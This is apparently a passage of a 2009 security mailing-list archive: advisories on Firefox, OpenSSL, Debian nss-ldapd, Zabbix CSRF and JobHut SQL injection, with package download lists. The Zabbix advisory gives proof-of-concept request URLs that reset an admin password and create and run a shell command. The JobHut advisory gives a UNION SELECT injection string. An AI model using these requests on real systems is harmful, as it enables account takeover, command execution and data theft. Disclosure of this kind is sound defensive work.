http://security.debian.org/pool/updates/main/n/nss-ldapd/libnss-ldapd_0.6.7.1_powerpc.deb
Size/MD5 checksum: 117700 25c2aaf21ef3e61c278b2f6349153429
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/n/nss-ldapd/libnss-ldapd_0.6.7.1_s390.deb
Size/MD5 checksum: 112830 3e95bd1c614983aafa36a81da5a599b4
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/n/nss-ldapd/libnss-ldapd_0.6.7.1_sparc.deb
Size/MD5 checksum: 107640 60c23c4f57accb6977019ba18eef3f06
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb
http://security.debian.org/ stable/updates main
For dpkg-ftp:
ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and
http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEARECAAYFAknRPW0ACgkQXm3vHE4uylrABQCfSut3rSYwx135GnSG/Z/B8GmJ
gwYAni9iHmz9N8F5zWmEBTIivjcwuu35
=xzjE
-----END PGP SIGNATURE-----
From - Tue Mar 31 11:47:20 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006dd3
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39877-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 13E66EC0FF
for <lists@securityspace.com>; Tue, 31 Mar 2009 11:42:44 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 461202374BB; Tue, 31 Mar 2009 08:14:46 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 23879 invoked from network); 30 Mar 2009 22:38:05 -0000
From: ZDI Disclosures <zdi-disclosures@tippingpoint.com>
To: FD <full-disclosure@lists.grok.org.uk>,
bugtraq <bugtraq@securityfocus.com>
Cc: ZDI Disclosures <zdi-disclosures@tippingpoint.com>
Date: Mon, 30 Mar 2009 17:41:16 -0500
Subject: ZDI-09-015: Mozilla Firefox XUL _moveToEdgeShift() Memory
Corruption Vulnerability
Thread-Topic: ZDI-09-015: Mozilla Firefox XUL _moveToEdgeShift() Memory
Corruption Vulnerability
Thread-Index: AcmxiKKx4V77gh17Ed6nMwAbY6UoyQ=Message-ID: <C5F6B4BC.15D4B%zdi-disclosures@tippingpoint.com>
Accept-Language: en-US
Content-Language: en
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
acceptlanguage: en-US
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
MIME-Version: 1.0
Status:
ZDI-09-015: Mozilla Firefox XUL _moveToEdgeShift() Memory Corruption
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-015
March 30, 2009
-- CVE ID:
CVE-2009-1044
-- Affected Vendors:
Mozilla Firefox
-- Affected Products:
Mozilla Firefox 3.0.x
-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page.
The specific flaw exists in the XUL tree method _moveToEdgeShift(). In
some cases this call will trigger garbage collection routines on in use
objects which will result in a future call to a dangling pointer. This
can be leveraged to execute arbitrary code under the context of the
current user.
-- Vendor Response:
Mozilla Firefox has issued an update to correct this vulnerability. More
details can be found at:
http://www.mozilla.org/security/announce/2009/mfsa2009-13.html
-- Disclosure Timeline:
2009-03-19 - Vulnerability reported to vendor
2009-03-30 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Nils
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
From - Tue Mar 31 11:57:23 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006dd4
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39878-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id CC761EC0FF
for <lists@securityspace.com>; Tue, 31 Mar 2009 11:52:06 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 3E48C237033; Tue, 31 Mar 2009 08:15:21 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24480 invoked from network); 30 Mar 2009 23:10:06 -0000
X-Spam-Checker-Version: SpamAssassin 3.2.5 (2008-06-10) on mail.ngenuity-is.com
X-Spam-Level:
X-Spam-Status: No, score=-4.2 required=5.0 tests=ALL_TRUSTED,AWL,BAYES_00
autolearn=ham version=3.2.5
Message-ID: <49D1520A.6020404@ngenuity-is.com>
Date: Mon, 30 Mar 2009 16:13:14 -0700
From: Adam Baldwin <adam_baldwin@ngenuity-is.com>
User-Agent: Thunderbird 2.0.0.21 (X11/20090318)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: Zabbix Multiple Frontend CSRF (Password reset & command execution)
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Status:
nGenuity Information Services - Security Advisory
Advisory ID: NGENUITY-2009-006 - Zabbix Multiple Frontend CSRF
Application: Zabbix 1.6.2
Vendor: Zabbix
Vendor website:
http://www.zabbix.com
Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
I. BACKGROUND
"ZABBIX is an enterprise-class open source distributed monitoring solution." [1]
II. DETAILS
Multiple Cross-Site Request Forgery (CSRF) vulnerabilities exist that can allow for the following
attack scenarios to be executed should an administrator with a valid session visit a malicious page
or url.
1. Reset admin password
2. Execution of shell commands
Reset Admin Password:
Zabbix does not validate a users old password before the new password is set using a request
similar to the below request. Some of the parameters are not required for the request to be
valid.
Example:
http://example.com/zabbix/profile.php?autologout�0&change_password=Change%20password
&config=0&form=1&form_refresh=2&lang=en_gb&password1�aaaa&password2�aaaa&refresh0
&save=Save&theme�fault.css&url=&userid=1
Execution of Shell Commands:
A two staged approach is required to execute arbitrary shell commands. First the custom command to
be executed has to be created and then that command has to be executed. Below is an example of how
these requests could be executed.
Example: Setting the command
http://example.com/zabbix/scripts.php?action=1&access=2&command=touch%20/tmp/zabbix&form=1
&form_refresh=1&form_refresh=1&groupid=0&name=Ping&save=Save&scriptid=1&usrgrpid=0
Example: Executing the command
http://example.com/zabbix/scripts_exec.php?execute=1&hostid017&scriptid=1
III. REFERENCES
[1] -
http://www.zabbix.com
IV. VENDOR COMMUNICATION
3.22.2009 - Vulnerability Discovery
3.23.2009 - Vendor response. Fixed in 1.6.3 (unconfirmed)
Copyright (c) 2009 nGenuity Information Services, LLC
http://www.ngenuity.org/wordpress/2009/03/30/ngenuity-2009-006-zabbix-multiple-frontend-csrf/
From - Tue Mar 31 12:07:14 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006dd5
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39879-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id F3553EC0FF
for <lists@securityspace.com>; Tue, 31 Mar 2009 12:03:41 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 9280F237041; Tue, 31 Mar 2009 08:15:40 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24510 invoked from network); 30 Mar 2009 23:10:55 -0000
Date: Mon, 30 Mar 2009 17:14:14 -0600
Message-Id: <200903302314.n2UNEElg020351@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: vuln@e-rdc.org
To: bugtraq@securityfocus.com
Subject: [ECHO_ADV_108$2009] JobHut <= 1.2 (pk) Remote Sql Injection
Vulnerability
Status:
ECHO_ADV_108$2009
-----------------------------------------------------------------------------------------
[ECHO_ADV_108$2009] JobHut <= 1.2 (pk) Remote Sql Injection Vulnerability
-----------------------------------------------------------------------------------------
Author : K-159
Date : March, 30 th 2009
Location : Jakarta, Indonesia
Web :
http://e-rdc.org/v1/news.php?readmore2
Critical Lvl : Moderate
Impact : Exposure of sensitive information
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : JobHut
version : <= 1.2
Vendor :
http://jobhut.spranger.us/
Description :
JobHut is an open source job board solution.
--------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~
Input passed to the "pk" parameter in browse.php page is not properly verified before being used
into sql queries.This vulnerability can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Poc/Exploit:
~~~~~~~
http://www.example.com/[path]/browse.php?pk=-1 union select @@version,2--
Dork:
~~~
Google : N/A
Solution:
~~~~~
- Edit the source code to ensure that input is properly verified.
Timeline:
~~~~~~~
- 21 - 03 - 2009 bug found
- 26 - 03 - 2009 vendor contacted
- 26 - 03 - 2009 vendor response
- 30 - 03 - 2009 advisory release
---------------------------------------------------------------------------
Shoutz:
~~~
~ ping - my dearest wife, zizau - my beloved son, i-eyes - my beloved daughter.
~ y3dips,the_day,Negatif,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,
the_hydra,neng chika, str0ke
~ scanners [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
~ SK,Abond,pokley,cybertank, super_temon,whatsoever,b120t0,inggar,fachri,adi,rahmat,indra
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,cyb3rh3b,cR4SH3R,ogeb,bagan,devsheed
~ dr188le,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,ghostblup,shamus,
kuntua, stev_manado,nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
~ milw0rm.com, macaholic.info, unitiga.com, mac.web.id, indowebster.com
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~
K-159 || echo|staff || adv[at]e-rdc[dot]org
Homepage:
http://www.e-rdc.org/
-------------------------------- [ EOF ] ----------------------------------
From - Tue Mar 31 12:17:14 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006dd6
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39880-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 6C038EC0F5
for <lists@securityspace.com>; Tue, 31 Mar 2009 12:13:37 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 4DA9F237392; Tue, 31 Mar 2009 08:15:49 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24683 invoked from network); 30 Mar 2009 23:20:26 -0000
Date: Mon, 30 Mar 2009 18:23:19 -0500
From: Jamie Strandboge <jamie@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-750-1] OpenSSL vulnerability
Message-ID: <20090330232319.GA23857@severus.strandboge.com>
Reply-To: Jamie Strandboge <jamie@canonical.com>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="VS++wcV0S1rZb1Fb"
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
Status:
--VS++wcV0S1rZb1Fb
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
==========================================================Ubuntu Security Notice USN-750-1 March 30, 2009
openssl vulnerability
CVE-2009-0590
==========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
libssl0.9.8 0.9.8a-7ubuntu0.7
Ubuntu 7.10:
libssl0.9.8 0.9.8e-5ubuntu3.4
Ubuntu 8.04 LTS:
libssl0.9.8 0.9.8g-4ubuntu3.5
Ubuntu 8.10:
libssl0.9.8 0.9.8g-10.1ubuntu2.2
After a standard system upgrade you need to reboot your computer to
effect the necessary changes.
Details follow:
It was discovered that OpenSSL did not properly validate the length of an
encoded BMPString or UniversalString when printing ASN.1 strings. If a user
or automated system were tricked into processing a crafted certificate, an
attacker could cause a denial of service via application crash in
applications linked against OpenSSL.
Updated packages for Ubuntu 6.06 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.7.diff.gz
Size/MD5: 51428 50fb8d12cf2b4415839c97dace22b007
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.7.dsc
Size/MD5: 822 6590596c731c73dc67da735e66191479
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a.orig.tar.gz
Size/MD5: 3271435 1d16c727c10185e4d694f87f5e424ee1
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.7_amd64.udeb
Size/MD5: 571944 2f15424474edee77dec078978ba77d2f
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7ubuntu0.7_amd64.deb
Size/MD5: 2167810 4df1b6270424f2f037a1c150725f761d
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8a-7ubuntu0.7_amd64.deb
Size/MD5: 1682810 f9c0929a3eaead9987b09acc5bb810ca
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8a-7ubuntu0.7_amd64.deb
Size/MD5: 875806 c17a675aaba84c554eee40884164c9e4
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.7_amd64.deb
Size/MD5: 984892 2b09a86c80dd7b80e9df8481adb54ffe
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.7_i386.udeb
Size/MD5: 509650 e2164e9a197c857d89c195a58c3e4f29
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7ubuntu0.7_i386.deb
Size/MD5: 2024362 1a42827169178912c5e45c280a3ffe5c
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8a-7ubuntu0.7_i386.deb
Size/MD5: 5053564 bc2cd6dc321e5ad546db8187838f1aad
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8a-7ubuntu0.7_i386.deb
Size/MD5: 2596644 7e693a95c0cc4e60f616f80ffbf75efc
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.7_i386.deb
Size/MD5: 976538 2bebed1c1fa530db5ff5c45b8363cfef
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.7_powerpc.udeb
Size/MD5: 558058 017ddbf5e528688c6de9b4304b50e64d
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7ubuntu0.7_powerpc.deb
Size/MD5: 2182032 3ab80d170a913d938cd81ad5f6ee0f75
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8a-7ubuntu0.7_powerpc.deb
Size/MD5: 1727652 75f3ef27ef40ca940106ac38365ae198
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8a-7ubuntu0.7_powerpc.deb
Size/MD5: 862224 b21f7aa2950a031b44d253c06eeacdc0
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.7_powerpc.deb
Size/MD5: 980742 b7fcb8ea2d1befb0ce1e75b089b8dc5e
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.7_sparc.udeb
Size/MD5: 531018 f5de513501ad0abe3701a7d1f0278fda
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7ubuntu0.7_sparc.deb
Size/MD5: 2093410 007f205cb4d3bdb0bbd58ba3611fd3b0
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8a-7ubuntu0.7_sparc.deb
Size/MD5: 3943284 673d9f66f5bcc7b36b27bae5c802f4b5
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8a-7ubuntu0.7_sparc.deb
Size/MD5: 2092080 88a6ea5db6b54dd210df86dd049ccd8f
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.7_sparc.deb
Size/MD5: 988852 057c0802488ebfa9751dc8f5b0e07452
Updated packages for Ubuntu 7.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8e-5ubuntu3.4.diff.gz
Size/MD5: 60153 0832a9f7f498eb779a6169b4c16e4a04
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8e-5ubuntu3.4.dsc
Size/MD5: 958 24d310eceafcfab5c2ba64a594c0bb53
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8e.orig.tar.gz
Size/MD5: 3341665 3a7ff24f6ea5cd711984722ad654b927
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8e-5ubuntu3.4_amd64.udeb
Size/MD5: 608766 d273f8a007354facad98fa27afffe1f2
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8e-5ubuntu3.4_amd64.deb
Size/MD5: 2065402 620e215050266013b93b9efac8b5c81f
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8e-5ubuntu3.4_amd64.deb
Size/MD5: 1644362 805f1866ee2218c23894061f881e5090
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8e-5ubuntu3.4_amd64.deb
Size/MD5: 929358 e4189d037040762f5e3fdcb341696550
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8e-5ubuntu3.4_amd64.deb
Size/MD5: 877790 d1b19d634c53b288c2b43795c348b551
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8e-5ubuntu3.4_i386.udeb
Size/MD5: 571760 998db14a2c9f5cd52e735517591e24d3
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8e-5ubuntu3.4_i386.deb
Size/MD5: 1943428 e3f6b1f36a8c1b2e50975fec06e98b1d
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8e-5ubuntu3.4_i386.deb
Size/MD5: 5520920 536de07bb5fb28451eb7aee287aaf095
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8e-5ubuntu3.4_i386.deb
Size/MD5: 2826130 78d61126e395d95d4b109781f10a5916
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8e-5ubuntu3.4_i386.deb
Size/MD5: 872056 02f914db2ba9bdf6612b42aa78ee1397
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8e-5ubuntu3.4_lpia.udeb
Size/MD5: 537252 386f364e6530eac0389afd9d15797f02
http://ports.ubuntu.com/pool/main/o/openssl/libssl-dev_0.9.8e-5ubuntu3.4_lpia.deb
Size/MD5: 1922148 fc1eb2e8a3cb492f3e87b11df21b38ce
http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8e-5ubuntu3.4_lpia.deb
Size/MD5: 1557510 8dcad6e009a1391af0f3f08ed0d1b216
http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8_0.9.8e-5ubuntu3.4_lpia.deb
Size/MD5: 836900 9c8d1643d32ce7ae2af38eb87f1a7d03
http://ports.ubuntu.com/pool/main/o/openssl/openssl_0.9.8e-5ubuntu3.4_lpia.deb
Size/MD5: 876576 8bef123f5c00887858ccab410a1d0733
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8e-5ubuntu3.4_powerpc.udeb
Size/MD5: 618064 0aabeac8f4547a6d3703aaf420336193
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8e-5ubuntu3.4_powerpc.deb
Size/MD5: 2093230 e3d1712c23fb2c15452e154085def1f2
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8e-5ubuntu3.4_powerpc.deb
Size/MD5: 1705518 35bd049df8918f47b7ae1313585c6647
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8e-5ubuntu3.4_powerpc.deb
Size/MD5: 946174 b6b4d92ed09ef125998d673f621ce85f
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8e-5ubuntu3.4_powerpc.deb
Size/MD5: 886172 c70442f70d8369a35b228cde970e2c6b
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8e-5ubuntu3.4_sparc.udeb
Size/MD5: 565296 8689c8e4416b213d90a71b33a5a402b0
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8e-5ubuntu3.4_sparc.deb
Size/MD5: 1987420 e028291eaa37389f0cb2413907faa104
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8e-5ubuntu3.4_sparc.deb
Size/MD5: 4050590 de4395775e90bbadd95394be0f52422f
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8e-5ubuntu3.4_sparc.deb
Size/MD5: 2221488 1d0594c2818c5d98b526a1abf1affc3b
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8e-5ubuntu3.4_sparc.deb
Size/MD5: 887286 63c0f5682869328f6a5073da5a231c97
Updated packages for Ubuntu 8.04 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-4ubuntu3.5.diff.gz
Size/MD5: 55462 65c8b896c58083816ceee8c8e94e5918
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-4ubuntu3.5.dsc
Size/MD5: 920 ff04ed952816bb43e7e883cf05ff8130
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g.orig.tar.gz
Size/MD5: 3354792 acf70a16359bf3658bdfb74bda1c4419
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl-doc_0.9.8g-4ubuntu3.5_all.deb
Size/MD5: 629072 61961a28b3d0c10f62ca97a57c6adaa5
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-4ubuntu3.5_amd64.udeb
Size/MD5: 603800 c1e5b92094731c45f01cc33f0fee6630
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8g-4ubuntu3.5_amd64.deb
Size/MD5: 2064854 482820f878f5d333d65d557319a9ab5f
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-4ubuntu3.5_amd64.deb
Size/MD5: 1604962 c19b77a8f0c953924538732aa5171ee6
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8g-4ubuntu3.5_amd64.deb
Size/MD5: 931634 6a7b46a1a64be9d12e4dfcaa5b1acce7
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-4ubuntu3.5_amd64.deb
Size/MD5: 390578 c01c25e6264366349d60fb6ace21bce5
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-4ubuntu3.5_i386.udeb
Size/MD5: 564938 51cac50604334163982c6e1397895c1b
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8g-4ubuntu3.5_i386.deb
Size/MD5: 1942008 b3526c8ac54dc67d6daf630d67c40a47
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-4ubuntu3.5_i386.deb
Size/MD5: 5341906 2461b9fed14a6199aa7d4bd6b7b9a652
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8g-4ubuntu3.5_i386.deb
Size/MD5: 2829630 eaa05f870fa2f9c57d7176f4e91a1b4a
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-4ubuntu3.5_i386.deb
Size/MD5: 385420 5af0e4c39cd52ceaafcd0a5125103902
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-4ubuntu3.5_lpia.udeb
Size/MD5: 535556 8c83eedc2a4cb3d59cb1b1f9877d7943
http://ports.ubuntu.com/pool/main/o/openssl/libssl-dev_0.9.8g-4ubuntu3.5_lpia.deb
Size/MD5: 1922562 db52bfdf000ab2671161284b9c6e63a2
http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-4ubuntu3.5_lpia.deb
Size/MD5: 1512814 4b39a74067fba83240eb82b8e108cff7
http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8_0.9.8g-4ubuntu3.5_lpia.deb
Size/MD5: 843380 424d2b1867409166bde88fc1d44a6d36
http://ports.ubuntu.com/pool/main/o/openssl/openssl_0.9.8g-4ubuntu3.5_lpia.deb
Size/MD5: 390004 5ed6989f97db5c4be56bef992d835347
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-4ubuntu3.5_powerpc.udeb
